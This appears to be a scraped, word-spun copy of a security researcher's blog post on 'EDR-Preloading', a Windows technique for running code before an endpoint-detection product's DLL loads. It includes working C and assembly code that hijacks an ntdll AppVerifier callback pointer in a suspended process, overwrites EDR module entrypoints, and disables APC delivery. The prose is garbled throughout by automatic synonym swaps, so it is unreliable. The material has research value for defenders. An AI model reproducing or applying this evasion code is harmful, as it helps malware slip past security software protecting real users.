Bypassing EDRs With EDR-Preloading

[ad_1]

Beforehand, I wrote an article detailing how system calls will be utilized to bypass consumer mode EDR hooks.
Now, I wish to introduce another method, “EDR-Preloading”, which includes working malicious code earlier than the EDR’s DLL is loaded into the method, enabling us to forestall it from working in any respect.
By neutralizing the EDR module, we are able to freely name capabilities usually with out having to fret about consumer mode hooks, subsequently don’t must depend on direct or oblique syscalls.

This method makes use of some assumptions and flaws in the best way EDRs load their consumer mode part.
The EDR must inject its DLL into each course of with a purpose to hook consumer mode perform, however run the DLL too early and the method will crash, run it too late and the method may have already executed malicious code.
The sweet-spot most EDRs have gone with is beginning their DLL as late in course of initialization as potential, while nonetheless with the ability to do every thing they want earlier than the method entrypoint known as.

theoretically, all we’d like is to discover a technique to load code a little bit bit earlier in course of initialization, then we are able to preempt the EDR.

To know when EDR DLLs can and may’t load, we have to perceive a bit about course of initialization.

At any time when a brand new course of is created, the kernel maps the goal executable’s picture into reminiscence together with ntdll.dll.
A single thread is then created, which is able to ultimately function the entrypoint thread.
Right now, the method is simply an empty shell (the PEB, TEB, and imports are all uninitialized). Earlier than the method entrypoint will be known as, a good bit of setup should be carried out.

At any time when a brand new thread begins, its begin tackle can be set to ntdll!LdrInitializeThunk(), which is answerable for calling ntdll!LdrpInitialize().

ntdll!LdrpInitialize() has two functions:

Initialize the method (if it’s not already initialized)
Initialize the thread

ntdll!LdrpInitialize() first checks the worldwide variable ntdll!LdrpProcessInitialized, which, if set to FALSE, will end in a name to ntdll!LdrpInitializeProcess() prior to string initialization.

ntdll!LdrpInitializeProcess() does what it says on the tin. It’ll arrange the PEB, resolve the method imports, and cargo any required DLLs.

Proper on the finish of ntdll!LdrpInitialize() is a name to ntdll!ZwTestAlert(), which is the perform used to run all of the Asynchronous Process Calls (APCs) within the present thread’s APC queue.
EDR drivers that inject code into the goal course of and name it by way of ntoskrnl!NtQueueApcThread() will see their code executed right here.

As soon as the thread and course of initialization is full and ntdll!LdrpInitialize() returns, ntdll!LdrInitializeThunk() will name ntdll!ZwContinue() which transfers execution again to the kernel.
The kernel will then set the thread instruction pointer to level to ntdll!RtlUserThreadStart(), which is able to name the executable entrypoint and the method’s life formally start.

Course of initialization circulation chart

Early APC queuing

Since APCs execute in First-in First-out order, it’s generally potential to preempt sure EDRs by queueing your individual APC first.
Many EDRs monitor for brand spanking new processes by register a kernel callback utilizing ntoskrnl!PsSetLoadImageNotifyRoutine().
At any time when a brand new course of begins, it robotically hundreds ntdll.dll and kernel32.dll, so this serves as a great way to detect when new processes are being initialized.
By beginning a course of in a suspended state, you’ll be able to queue an APC previous to initialization, subsequently ending up on the entrance of the queue.
This method is usually known as “Early Hen injection”.

The issue with queuing APCs is that they have lengthy been used for code injection, subsequently ntdll!NtQueueApcThread() is hooked and monitored by most EDRs.
Queuing an APC right into a suspended course of is extremely suspicious and in addition properly documented. It’s additionally potential the EDR may hook your
APC, re-order the APC queue, or do any matter of different issues to make sure its DLL runs first.

TLS Callback

TLS callbacks are executed in direction of the tip of ntdll!LdrpInitializeProcess(), however previous to ntdll!ZwTestAlert(), so, run earlier than any APCs.
In instances the place an software makes use of TLS callback, some EDRs might inject code to intercept the callback, or load the EDR DLL barely earlier to compensate.
A lot to my amazement, one EDRs I examined on was nonetheless bypassable utilizing a TLS callback.

My purpose was easy, however truly not easy in any respect, and in addition very time-consuming.
I wished to discover a technique to execute code earlier than the entrypoint, earlier than TLS callbacks, at the start that might probably intervene with my code.
This meant reverse engineering your entire course of and DLL loader to search for something I may use. In the long run, I discovered precisely what I wanted.

Behold, the AppVerifier and ShimEnginer interfaces

Way back, Microsoft created a instrument known as AppVerifier, for, properly, app verification.
It’s designed to watch purposes at runtime for bugs, compatibility points, and so forth.
A lot of AppVerifier’s performance is facilitated by the addition of an entire host of recent callbacks inside ntdll.

Whereas reverse engineering the AppVerifier layer, I truly discovered two units of helpful callback (AppVerifier and ShimEngine).

Shim Engine associated variables

App Verifier associated variables

Two pointers that caught my eye had been ntdll!g_pfnSE_GetProcAddressForCaller and ntdll!AvrfpAPILookupCallbackRoutine, a part of the ShimEngine and AppVerifier layers respectively.
Each pointers are known as towards the tip of ntdll!LdrGetProcedureAddressForCaller(), which is the perform used internally by GetProcAddress() to resolve the tackle of exported capabilities.

The code in LdrGetProcedureAddressForCaller() which implements the callbacks

These callbacks are excellent as a result of LdrGetProcedureAddress() is assured to be known as by LdrpInitializeProcess() when it hundreds kernelbase.dll.
It’s additionally known as any time something tries to resolve an export with GetProcAddress() / LdrGetProcedureAddress(), together with the EDR, which has a whole lot of enjoyable potential.
Even higher, these pointers exist in a reminiscence part that’s writable previous to course of initialization.

Deciding on a callback to hook

While there have been many good choices, I made a decision to go along with AvrfpAPILookupCallbackRoutine, which seems to have been launched in Home windows 8.1.
While I may use the older callbacks for compatibility with earlier Home windows model, it’d be much more work and I wished to maintain my PoC easy.

The remainder of the AppVerifer interface requires that you just set up a “Verifier Supplier”, which requires a ton of reminiscence manipulation.
The ShimEngine is barely simpler, however setting g_ShimsEnabled to TRUE enabled all callbacks, not simply the one we wish, so we should register each callback or the appliance will crash.

The newer AvrfpAPILookupCallbackRoutine is very nice for 2 causes:

It may be enabled independently of the AppVerifier interface by setting ntdll!AvrfpAPILookupCallbacksEnabled, so no AppVerifier supplier wanted.
Each ntdll!AvrfpAPILookupCallbacksEnabled and ntdlL!AvrfpAPILookupCallbackRoutine are simply locatable in reminiscence, particularly on Home windows 10.

For demonstration functions I made a decision to construct a proof-of-concept that makes use of the AvrfpAPILookupCallbackRoutine callback to load earlier than the EDR DLL, then stop it from loading.
At the moment, I’ve solely examined it on two main EDRs, but it surely ought to theoretically work in opposition to any EDR code injection with just a few tweaks.

You’ll find the total supply code on the backside of the article.

Step 1: finding the AppVerifier callback pointer

With the intention to arrange a callback we have to set ntdll!AvrfpAPILookupCallbacksEnabled and ntdll!AvrfpAPILookupCallbackRoutine.
On Home windows 10, each variables are situated towards the start of ntdll’s .mrdata part, which is writable throughout course of initialization.

ntdll!AvrfpAPILookupCallbacksEnabled is discovered direct after ntdll!LdrpMrdataBase (although generally ntdll!LdrpKnownDllDirectoryHandle sits earlier than it).

Each variables appear to at all times be precisely 8 bytes aside and in the identical order.
In an initialized course of, the structure ought to look one thing like this:

offset+0x00 – ntdll!LdrpMrdataBase (set to base tackle of .mrdata part)
offset+0x08 – ntdll!LdrpKnownDllDirectoryHandle (set to a non-zero worth)
offset+0x10 – ntdll!AvrfpAPILookupCallbacksEnabled (set to zero)
offset+0x18 – ntdll!AvrfpAPILookupCallbackRoutine (set to zero)

We are able to scan the .mrdata part in our personal course of for a pointer containing the part base tackle, then the primary NULL worth after that can be AvrfpAPILookupCallbackRoutine.

ULONG_PTR find_avrfp_address(ULONG_PTR mrdata_base) {
    ULONG_PTR address_ptr = mrdata_base + 0x280;  //the pointer we wish is 0x280+ bytes in
    ULONG_PTR ldrp_mrdata_base = NULL;

    for (int i = 0; i < 10; i++) {
        if (*(ULONG_PTR*)address_ptr == mrdata_base) {
            ldrp_mrdata_base = address_ptr;
            break;
        }
        address_ptr += sizeof(LPVOID);  // skip to the following pointer
    }
    
    address_ptr = ldrp_mrdata_base;
    
    // AvrfpAPILookupCallbackRoutine ought to be the primary NULL pointer after LdrpMrdataBase
    for (int i = 0; i < 10; i++) {
        if (*(ULONG_PTR*)address_ptr == NULL) {
            return address_ptr;
        }
        address_ptr += sizeof(LPVOID);  // skip to the following pointer
    }
    return NULL;
}

Step 2: organising the callback to name our malicious code

The best technique to arrange the callback is simply launch a second copy of our personal course of in a suspended state.
Since ntdll is on the similar tackle in each course of, we solely must find the callback pointer in our personal course of.
As soon as our course of is launched however in a suspended state, we are able to simply use WriteProcessMemory() to set the pointer.

We may additionally use this method for course of hollowing, shellcode injection, and extra, because it permits us to execute code with out creating/hijacking threads, or queuing an APC. However for this PoC we’ll hold it easy.

notice: since many ntdll pointers are encrypted, we are able to’t simply set the pointer to our goal tackle. We have now to encrypt it first.
Fortunately, the hot button is the identical worth and saved on the similar location throughout all processes.

LPVOID encode_system_ptr(LPVOID ptr) {
    // get pointer cookie from SharedUserData!Cookie (0x330)
    ULONG cookie = *(ULONG*)0x7FFE0330;

    // encrypt our pointer so it will work when written to ntdll
    return (LPVOID)_rotr64(cookie ^ (ULONGLONG)ptr, cookie & 0x3F);
}

Now we are able to simply write the pointer and set AvrfpAPILookupCallbacksEnabled to 1 utilizing WriteProcessMemory():

    // ntdll pointer are encoded utilizing the system pointer cookie situated at SharedUserData!Cookie
    LPVOID callback_ptr = encode_system_ptr(&My_LdrGetProcedureAddressCallback);

    // set ntdll!AvrfpAPILookupCallbacksEnabled to TRUE
    uint8_t bool_true = 1;

    // set ntdll!AvrfpAPILookupCallbackRoutine to our encoded callback tackle
    if (!WriteProcessMemory(pi.hProcess, (LPVOID)(avrfp_address+8), &callback_ptr, sizeof(ULONG_PTR), NULL)) {
        printf("Write 2 failed, error: %dn", GetLastError());
    }

    if (!WriteProcessMemory(pi.hProcess, (LPVOID)avrfp_address, &bool_true, 1, NULL)) {
        printf("Write 3 failed, error: %dn", GetLastError());
    }

Step 3: executing the callback & neutralizing the EDR

As soon as we name ResumeThread() on the suspended course of, our callback can be executed each time LdrpGetProcedureAddress() known as, the primary of which ought to be when LdrpInitializeProcess() hundreds kernelbase.dll.

LdrpInitializeProcess calling LdrLoadDll to load kernelbase.dll

A phrase of warning: kernelbase.dll is just not totally loaded when our callback is fired, and the set off occurs inside LdrLoadDll, thus the loader lock continues to be acquired.
Kernelbase not but being loaded means we’re restricted to calling solely ntdll capabilities, and the loader lock prevents us from launching any threads or processes, in addition to loading DLLs.

Since we’re extremely restricted in what we are able to do, the best plan of action is to simply stop the EDR DLL from loading, then wait till the method is totally initialized earlier than beginning the malware get together.

To make sure correct neutralization of the EDRs I examined on, I took a multi-pronged strategy.

DLL Clobbering

This early within the course of lifecycle solely ntdll.dll, kernel32.dll, and kernelbase.dll ought to be loaded.
Some EDRs might pre-emptively map their DLL into reminiscence, however wait till later to name the entrypoint.
While we may in all probability unload these DLLs by calling ntdll!LdrUnloadDll() as soon as the loader lock is launched (or do it manually), a fast and soiled resolution is to simply clobber their entrypoints.

What we’ll do is iterate by the LDR module listing and simply exchange the entrypoint tackle of any DLL that shouldn’t be there.

DWORD EdrParadise() {
    // we'll changed the EDR entrypoint with this equally helpful perform
    // todo: cease malware

    return ERROR_TOO_MANY_SECRETS;
}

void DisablePreloadedEdrModules() {
    PEB* peb = NtCurrentTeb()->ProcessEnvironmentBlock;
    LIST_ENTRY* list_head = &peb->Ldr->InMemoryOrderModuleList;
    LIST_ENTRY* list_entry = list_head->Flink->Flink;

    whereas (list_entry != list_head) {
        PLDR_DATA_TABLE_ENTRY2 module_entry = CONTAINING_RECORD(list_entry, LDR_DATA_TABLE_ENTRY2, InMemoryOrderLinks);

        // solely the under DLLs ought to be loaded this early, the rest might be a safety product
        if (SafeRuntime::wstring_compare_i(module_entry->BaseDllName.Buffer, L"ntdll.dll") != 0 &&
            SafeRuntime::wstring_compare_i(module_entry->BaseDllName.Buffer, L"kernel32.dll") != 0 &&
            SafeRuntime::wstring_compare_i(module_entry->BaseDllName.Buffer, L"kernelbase.dll") != 0) {

            module_entry->EntryPoint = &EdrParadise;
        }

        list_entry = list_entry->Flink;
    }
}

Disabling the APC dispatcher

When APCs are queued to a thread they get processed by ntdll!KiUserApcDispatcher(), which runs the APC then calls ntdll!NtContinue() to return the thread to its authentic context.
By hooking KiUserApcDispatcher and changing it with our personal perform that simply calls NtContinue() on a loop, no APCs can ever be queued into our course of (together with these from the EDR’s kernel driver).

; easy APC dispatcher that does every thing besides dispatch APCs
KiUserApcDispatcher PROC
  _loop:
    name GetNtContinue
    mov rcx, rsp
    mov rdx, 1
    name rax
    jmp _loop
  ret
KiUserApcDispatcher ENDP

Proxying LdrLoadDll calls

By putting a hook on ntdll!LdrLoadDll(), we are able to monitor which DLLs are being loaded.
If any EDR tries to load its DLL utilizing LdrLoadDll, we are able to unload or disable it.
Ideally we in all probability wish to hook ntdll!LdrpLoadDll(), which is decrease stage and known as straight by some EDRs, however for simplicity’s sake, we’ll simply use LdrLoadDll.

// we are able to use this hook to forestall new modules from being loaded (although with each EDRs I examined, we needn't)
NTSTATUS WINAPI LdrLoadDllHook(PWSTR search_path, PULONG dll_characteristics, UNICODE_STRING* dll_name, PVOID* base_address) {
    
    //todo: DLL create a listing of DLLs to both be allowed or disallowed
    
    return OriginalLdrLoadDll(search_path, dll_characteristics, dll_name, base_address);
}

Whereas this PoC is simply designed for Home windows 10 64-bit, the method ought to be viable on methods a minimum of as early as Home windows 7 (I haven’t checked XP or Vista).
Nevertheless, discovering the right offsets is tougher under Home windows 10. For a extra sturdy technique, I like to recommend utilizing a disassembler.
Both manner, this was a reasonably enjoyable weekend undertaking and hopefully somebody is ready to be taught one thing from it.

In the event you get pleasure from my work please observe me on LinkedIn and Mastodon for extra.

You’ll find the total supply code right here: github.com/MalwareTech/EDR-Preloader

[ad_2]